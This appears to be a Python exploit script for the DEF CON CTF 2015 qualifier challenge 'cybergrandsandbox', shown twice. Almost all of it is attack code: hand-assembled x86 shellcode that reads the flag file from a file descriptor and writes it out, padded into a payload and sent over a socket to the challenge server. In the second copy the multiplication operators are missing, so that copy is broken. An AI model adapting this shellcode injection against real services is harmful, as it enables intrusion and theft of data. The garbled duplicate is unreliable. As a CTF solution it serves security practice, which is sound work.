jgor/defconctf2015_cybergrandsandbox.py

## defconctf2015_cybergrandsandbox.py
#!/usr/bin/env python
import socket

# b8 03 00 00 00          mov    $0x3,%eax   # syscall 3 (read)
# bb 03 00 00 00          mov    $0x3,%ebx   # from fd 3 (flag file)
# 89 e1                   mov    %esp,%ecx   # to stack
# ba 30 00 00 00          mov    $0x30,%edx  # 0x30 bytes
# cd 80                   int    $0x80       # perform syscall
# b8 02 00 00 00          mov    $0x2,%eax   # syscall 2 (write)
# bb 01 00 00 00          mov    $0x1,%ebx   # to fd 1 (stdout)
# 89 e1                   mov    %esp,%ecx   # from stack
# ba 30 00 00 00          mov    $0x30,%edx  # 0x30 bytes
# cd 80                   int    $0x80       # perform syscall
# b8 01 00 00 00          mov    $0x1,%eax   # syscall 1 (exit)
# bb 00 00 00 00          mov    $0x0,%ebx   # return code 0
# cd 80                   int    $0x80       # perform syscall

shellcode = "0x80cd0000 0x0000bb00 0x000001b8 0x80cd80cd " \
          + "0x00000030 0xbae18900 0x000001bb 0x00000002 " \
          + "0xb880cd00 0x000030ba 0xe1890000 0x0003bb00 " \
          + "0x000003b8 "

payload = "0x0 "*278 + shellcode + "0x0 "*3 + "\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((
  'cybergrandsandbox_e722a7ec2ad46b9fb8472db37cb95713.quals.shallweplayaga.me',
  4347
  ))

s.recv(256)
s.send(payload)
output = s.recv(256)
print output
	#!/usr/bin/env python
	import socket

	# b8 03 00 00 00 mov $0x3,%eax # syscall 3 (read)
	# bb 03 00 00 00 mov $0x3,%ebx # from fd 3 (flag file)
	# 89 e1 mov %esp,%ecx # to stack
	# ba 30 00 00 00 mov $0x30,%edx # 0x30 bytes
	# cd 80 int $0x80 # perform syscall
	# b8 02 00 00 00 mov $0x2,%eax # syscall 2 (write)
	# bb 01 00 00 00 mov $0x1,%ebx # to fd 1 (stdout)
	# 89 e1 mov %esp,%ecx # from stack
	# ba 30 00 00 00 mov $0x30,%edx # 0x30 bytes
	# cd 80 int $0x80 # perform syscall
	# b8 01 00 00 00 mov $0x1,%eax # syscall 1 (exit)
	# bb 00 00 00 00 mov $0x0,%ebx # return code 0
	# cd 80 int $0x80 # perform syscall

	shellcode = "0x80cd0000 0x0000bb00 0x000001b8 0x80cd80cd " \
	+ "0x00000030 0xbae18900 0x000001bb 0x00000002 " \
	+ "0xb880cd00 0x000030ba 0xe1890000 0x0003bb00 " \
	+ "0x000003b8 "

	payload = "0x0 "278 + shellcode + "0x0 "3 + "\n"

	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((
	'cybergrandsandbox_e722a7ec2ad46b9fb8472db37cb95713.quals.shallweplayaga.me',
	4347
	))

	s.recv(256)
	s.send(payload)
	output = s.recv(256)
	print output